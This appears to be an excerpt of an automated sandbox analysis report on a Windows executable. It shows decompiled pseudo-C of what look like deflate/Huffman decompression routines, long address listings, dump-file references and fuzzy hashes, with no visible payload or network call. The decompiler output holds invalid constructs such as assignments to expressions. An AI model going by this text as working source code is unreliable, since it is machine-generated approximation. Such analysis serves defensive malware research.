														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406a9b
0x00406a9b
0x00406a9b
0x00406a9b
0x00406a9b
0x00406a9f
0x00000000
0x00000000
0x00406aa5
0x00406aa5
0x00406aa8
0x00406aab
0x00406ab0
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abb
0x00406abb
0x00406abe
0x00000000
0x00000000
0x00406ac0
0x00406ac0
0x00406ac3
0x00406ac8
0x00406aca
0x00406acd
0x00406ad3
0x00406832
0x00406832
0x00406835
0x0040683b
0x00406841
0x0040684a
0x00406850
0x00406853
0x0040685a
0x0040685f
0x00406865
0x00406870
0x00406870
0x00406ad9
0x00406ad9
0x00406ae3
0x00000000
0x00000000
0x00406ae9
0x00406ae9
0x00406aed
0x00406af0
0x00406af0
0x00406af4
0x00406afa
0x00406afa
0x00406afd
0x00406b00
0x00406b06
0x00000000
0x00000000
0x00406b08
0x00406b2a
0x00406b2a
0x00406b2d
0x00000000
0x00000000
0x00406b0a
0x00406b0e
0x00000000
0x00000000
0x00406b14
0x00406b14
0x00406b17
0x00406b1a
0x00406b1f
0x00406b21
0x00406b24
0x00406b27
0x00406b27
0x00406b2f
0x00406b2f
0x00406b35
0x00406b38
0x00406b3b
0x00406b3b
0x00406b42
0x00406b46
0x00406b4a
0x00406b4d
0x00406b50
0x00406b56
0x00406b5b
0x00000000
0x00000000
0x00406b5d
0x00406b71
0x00406b71
0x00406b75
0x00000000
0x00000000
0x00406b5f
0x00406b62
0x00406b62
0x00406b69
0x00406b6e
0x00406b6e
0x00406b6e
0x00406b77
0x00406b77
0x00406b7a
0x00406b88
0x00406b8e
0x00406b93
0x00406b99
0x00406b9f
0x00406ba5
0x00406bac
0x00406bc0
0x00406bc0
0x0040718f
0x0040718f
0x0040718f
0x00407194
0x00000000
0x00000000
0x004067cc
0x004067cc
0x00000000
0x00406dc7
0x00406dc7
0x00406dcb
0x00406dce
0x00406dd1
0x00406dd4
0x00000000
0x00000000
0x00406dda
0x00406dda
0x00406dff
0x00406dff
0x00406dff
0x00406e01
0x00000000
0x00000000
0x00406ddf
0x00406ddf
0x00406de3
0x00000000
0x00000000
0x00406de9
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df4
0x00406df6
0x00406df9
0x00406dfc
0x00406dfc
0x00406dfc
0x00406e03
0x00406e03
0x00406e0b
0x00406e0e
0x00406e11
0x00406e14
0x00406e18
0x00406e1b
0x00406e1d
0x00406e20
0x00406e22
0x00406e36
0x00406e36
0x00406e39
0x00406e53
0x00406e53
0x00406e56
0x00000000
0x00000000
0x00406e5c
0x00406e5c
0x00406e5f
0x00000000
0x00000000
0x00406e65
0x00406e65
0x00000000
0x00406e65
0x00406e3b
0x00406e3e
0x00406e45
0x00406e48
0x00000000
0x00406e48
0x00406e24
0x00406e28
0x00406e2b
0x00000000
0x00000000
0x00406e70
0x00406e70
0x00406e95
0x00406e95
0x00406e95
0x00406e97
0x00000000
0x00000000
0x00406e75
0x00406e75
0x00406e79
0x00000000
0x00000000
0x00406e7f
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8a
0x00406e8c
0x00406e8f
0x00406e92
0x00406e92
0x00406e92
0x00406e99
0x00406ea1
0x00406ea4
0x00406ea7
0x00406ea9
0x00406eac
0x00406eac
0x00406eae
0x00406eb2
0x00406eb5
0x00406eb8
0x00406ebb
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ee6
0x00406ee6
0x00406ee6
0x00406ee8
0x00000000
0x00000000
0x00406ec6
0x00406ec6
0x00406eca
0x00000000
0x00000000
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed9
0x00406edb
0x00406edd
0x00406ee0
0x00406ee3
0x00406ee3
0x00406ee3
0x00406eea
0x00406eea
0x00406ef2
0x00406ef5
0x00406ef8
0x00406efb
0x00406eff
0x00406f02
0x00406f04
0x00406f07
0x00406f0a
0x00406f24
0x00406f24
0x00406f27
0x00000000
0x00000000
0x00406f2d
0x00406f2d
0x00406f30
0x00406f37
0x00000000
0x00406f37
0x00406f0c
0x00406f0f
0x00406f16
0x00406f19
0x00000000
0x00000000
0x00406f3f
0x00406f3f
0x00406f64
0x00406f64
0x00406f64
0x00406f66
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x00000000
0x00000000
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f59
0x00406f5b
0x00406f5e
0x00406f61
0x00406f61
0x00406f61
0x00406f68
0x00406f70
0x00406f73
0x00406f76
0x00406f78
0x00406f7b
0x00406f7b
0x00406f7d
0x00000000
0x00000000
0x00406f83
0x00406f83
0x00406f86
0x00406f8b
0x00406f8d
0x00406f93
0x00406f95
0x00406faa
0x00406fac
0x00406fac
0x00406f97
0x00406f9d
0x00406f9f
0x00406fa1
0x00406fa1
0x00406fae
0x00406fb2
0x00406fb5
0x00406fbb
0x00406fbb
0x00406fbe
0x00406fbe
0x00406fbe
0x00406fc0
0x00000000
0x00000000
0x00406fc6
0x00406fc6
0x00406fcc
0x00406fce
0x00406ff3
0x00406ff6
0x00406ffc
0x00407001
0x00407007
0x0040700d
0x0040700f
0x00407012
0x0040701b
0x00407021
0x00407021
0x00407014
0x00407016
0x00407018
0x00407018
0x00407023
0x00407029
0x0040702b
0x0040702e
0x00407030
0x00407036
0x00407038
0x0040703a
0x0040703c
0x0040703e
0x00407041
0x0040704a
0x0040704d
0x0040704d
0x00407043
0x00407043
0x00407046
0x00407046
0x00407041
0x00407038
0x0040704f
0x00407051
0x00000000
0x00000000
0x00000000
0x00000000
0x00407051
0x00406fd0
0x00406fd0
0x00406fd6
0x00406fdc
0x00406fde
0x00000000
0x00000000
0x00406fe0
0x00406fe0
0x00406fe2
0x00406fe4
0x00406fed
0x00406fed
0x00406fe6
0x00406fe6
0x00406fe9
0x00406fe9
0x00406fef
0x00406ff1
0x00000000
0x00000000
0x00407057
0x00407057
0x0040705c
0x0040705e
0x0040705f
0x00407060
0x00407061
0x00407067
0x0040706a
0x0040706d
0x00407070
0x00407072
0x00407078
0x00407078
0x0040707b
0x0040707b
0x0040707b
0x0040707b
0x00407084
0x00000000
0x00000000
0x00407089
0x00407089
0x0040708c
0x0040708f
0x00407091
0x00407128
0x00407128
0x0040712b
0x0040712d
0x0040712e
0x0040712f
0x00407132
0x00000000
0x00407132
0x00407097
0x00407097
0x0040709d
0x0040709f
0x004070c4
0x004070c7
0x004070cd
0x004070d2
0x004070d8
0x004070de
0x004070e0
0x004070e3
0x004070ec
0x004070f2
0x004070f2
0x004070e5
0x004070e7
0x004070e9
0x004070e9
0x004070f4
0x004070fa
0x004070fc
0x004070ff
0x00407101
0x00407107
0x00407109
0x0040710b
0x0040710d
0x0040710f
0x00407112
0x0040711b
0x0040711e
0x0040711e
0x00407114
0x00407114
0x00407117
0x00407117
0x00407112
0x00407109
0x00407120
0x00407122
0x00000000
0x00000000
0x00000000
0x00000000
0x00407122
0x004070a1
0x004070a1
0x004070a7
0x004070ad
0x004070af
0x00000000
0x00000000
0x004070b1
0x004070b1
0x004070b3
0x004070b5
0x004070bc
0x004070bc
0x004070be
0x004070b7
0x004070b7
0x004070b9
0x004070b9
0x004070c0
0x004070c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040713a
0x0040713a
0x0040713d
0x0040713f
0x00407142
0x00407145
0x00407145
0x00407145
0x00407145
0x00000000
0x00000000
0x00000000
0x004067f3
0x004067d7
0x00000000
0x004067dd
0x004067e0
0x004067ea
0x004067ed
0x004067f0
0x00000000
0x004067f0
0x004067d7
0x004067fb
0x004067fe
0x00406802
0x0040680c
0x00406816
0x00406819
0x0040681f
0x00406953
0x00406955
0x0040695b
0x0040695e
0x00406961
0x00000000
0x00406961
0x00406825
0x00406825
0x00406826
0x0040687e
0x0040687e
0x00406885
0x0040692b
0x0040692b
0x00406930
0x00406933
0x00406938
0x0040693b
0x00406940
0x00406943
0x00406948
0x0040694b
0x0040694b
0x00000000
0x0040688b
0x0040688b
0x0040688b
0x0040688b
0x0040688f
0x0040688f
0x004068b1
0x004068b4
0x004068b6
0x004068b9
0x004068be
0x00406894
0x00406894
0x00406899
0x0040689b
0x0040689d
0x004068a2
0x004068a8
0x004068ad
0x004068af
0x004068af
0x004068a4
0x004068a4
0x004068a4
0x004068a2
0x00000000
0x004068c0
0x004068ed
0x004068f2
0x004068f4
0x004068f5
0x004068f7
0x004068f8
0x004068f8
0x004068f8
0x00406920
0x00406925
0x00406925
0x00000000
0x00406925
0x004068be
0x00406885
0x00406828
0x00406828
0x00406829
0x00406873
0x00000000
0x00406873
0x0040682b
0x0040682c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406988
0x00406988
0x00406988
0x0040698b
0x00000000
0x00000000
0x00406968
0x00406968
0x0040696c
0x00000000
0x00000000
0x00406972
0x00406972
0x00406975
0x00406978
0x0040697d
0x0040697f
0x00406982
0x00406985
0x00406985
0x00406985
0x0040698d
0x0040698d
0x00406990
0x00406992
0x00406997
0x0040699a
0x0040699c
0x0040699f
0x00000000
0x00000000
0x004069a5
0x004069a5
0x004069a7
0x00000000
0x00000000
0x004069ad
0x004069ad
0x004069b1
0x00000000
0x00000000
0x004069b7
0x004069b7
0x004069ba
0x004069bc
0x00406a5a
0x00406a5a
0x00406a5d
0x00406a5f
0x00406a5f
0x00406a62
0x00406a65
0x00406a67
0x00406a69
0x00406a6b
0x00406a6b
0x00406a74
0x00406a79
0x00406a7c
0x00406a7f
0x00406a82
0x00406a85
0x00406a85
0x00406a85
0x00406a88
0x00406a8e
0x00406a8e
0x00406a94
0x00406a94
0x00406a94
0x00000000
0x00406a88
0x004069c2
0x004069c2
0x004069c8
0x004069cb
0x004069cd
0x004069f8
0x004069fb
0x00406a01
0x00406a06
0x00406a0c
0x00406a12
0x00406a14
0x00406a17
0x00406a20
0x00406a26
0x00406a26
0x00406a19
0x00406a1b
0x00406a1d
0x00406a1d
0x00406a28
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a3b
0x00406a3d
0x00406a3f
0x00406a42
0x00406a4b
0x00406a4b
0x00406a4d
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a4f
0x00406a4f
0x00406a3d
0x00406a52
0x00406a54
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a54
0x004069cf
0x004069cf
0x004069d5
0x004069db
0x004069dd
0x00000000
0x00000000
0x004069df
0x004069df
0x004069e1
0x004069e3
0x004069e6
0x004069ed
0x004069ed
0x004069ef
0x004069e8
0x004069e8
0x004069ea
0x004069ea
0x004069f1
0x004069f3
0x004069f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406afa
0x00406afd
0x00406b00
0x00406b06
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cdd
0x00406cdd
0x00406cdd
0x00406ce0
0x00406ce3
0x00406ce5
0x00406ce8
0x00406cee
0x00406cf5
0x00406cf7
0x00000000
0x00000000
0x00406bcb
0x00406bcb
0x00406bf3
0x00406bf3
0x00406bf3
0x00406bf5
0x00000000
0x00000000
0x00406bd3
0x00406bd3
0x00406bd7
0x00000000
0x00000000
0x00406bdd
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be8
0x00406bea
0x00406bed
0x00406bf0
0x00406bf0
0x00406bf0
0x00406bf7
0x00406bf7
0x00406bff
0x00406c02
0x00406c08
0x00406c0b
0x00406c0f
0x00406c13
0x00406c16
0x00406c19
0x00406c31
0x00406c31
0x00406c34
0x00406c42
0x00406c45
0x00406c36
0x00406c36
0x00406c38
0x00406c3f
0x00406c3f
0x00406c6e
0x00406c6e
0x00406c6e
0x00406c71
0x00406c73
0x00000000
0x00000000
0x00406c4e
0x00406c4e
0x00406c52
0x00000000
0x00000000
0x00406c58
0x00406c58
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c65
0x00406c68
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c75
0x00406c75
0x00406c77
0x00406c79
0x00406c84
0x00406c87
0x00406c8a
0x00406c8c
0x00406c8e
0x00406c90
0x00406c93
0x00406c96
0x00406c9b
0x00406c9e
0x00406ca1
0x00406ca4
0x00406cab
0x00406cae
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb6
0x00406cba
0x00406ccb
0x00406ccb
0x00406ccb
0x00406ccd
0x00406ccd
0x00406cd1
0x00406cd1
0x00406cd1
0x00406cd3
0x00406cd4
0x00406cd7
0x00406cd7
0x00406cd7
0x00406cda
0x00000000
0x00406cda
0x00406cbc
0x00406cbc
0x00406cbf
0x00000000
0x00000000
0x00406cc5
0x00406cc5
0x00000000
0x00406cc5
0x00406c1b
0x00406c1b
0x00406c1d
0x00406c1f
0x00406c22
0x00406c25
0x00406c29
0x00406c29
0x00406cfd
0x00406cfd
0x00406d00
0x00406d07
0x00406d0b
0x00406d0d
0x00406d10
0x00406d13
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1e
0x00406d21
0x00406d2c
0x00406d2f
0x00406d46
0x00406d4b
0x00406d52
0x00406d57
0x00406d5b
0x00406d5d
0x00406d5d
0x00406d5d
0x00406d60
0x00406d62
0x00000000
0x00406d68
0x00406d68
0x00406d6c
0x00406d77
0x00406d8a
0x00406d8f
0x00406d94
0x00406d96
0x00000000
0x00000000
0x00406d9c
0x00406d9c
0x00406d9f
0x00406da1
0x00406daf
0x00406daf
0x00406db2
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dc1
0x00406dc4
0x00000000
0x00406dc4
0x00406da3
0x00406da3
0x00406da9
0x00000000
0x00000000
0x00000000
0x00406da9
0x00000000
0x00000000
0x00000000
0x00407148
0x00407148
0x0040714e
0x00407154
0x00407159
0x0040715f
0x00407165
0x00407167
0x0040716a
0x00407173
0x00407179
0x00407179
0x0040716c
0x0040716e
0x00407170
0x00407170
0x0040717b
0x0040717d
0x00407180
0x004071bb
0x004071bb
0x00000000
0x00407182
0x00407182
0x00407182
0x00407188
0x0040718b
0x0040718d
0x004071c2
0x004071c4
0x00000000
0x004071c4
0x00000000
0x0040718d
0x00000000
0x004067cc
0x0040719a
0x00000000
0x0040719a
0x00406bae
0x00406bb0
0x00000000
0x00000000
0x00406bb2
0x00406bb2
0x00406bb5
0x00000000
0x00406bb5
0x00406afa
0x00406abb
0x0040719f
0x004071a2
0x004071a4
0x004071ad
0x004071b3
0x00000000

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00407272, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x0040727d
0x00407285
0x00407289
0x0040728b
0x0040728e
0x00407290
0x00407290
0x00407292
0x00407299
0x0040729b
0x0040729b
0x004072a1
0x004072b6
0x004072be
0x004072c0
0x004072c2
0x004072c5
0x004072c6
0x004072c6
0x004072cc
0x00000000
0x00000000
0x004072ce
0x004072d1
0x00000000
0x00000000
0x00000000
0x004072d1
0x004072d5
0x004072d8
0x004072da
0x004072da
0x004072dd
0x004072e3
0x004072e4
0x00000000
0x00000000
0x00000000
0x004072e4
0x004072e9
0x004072ec
0x004072ee
0x004072ee
0x004072f4
0x004072f6
0x00407307
0x004072fa
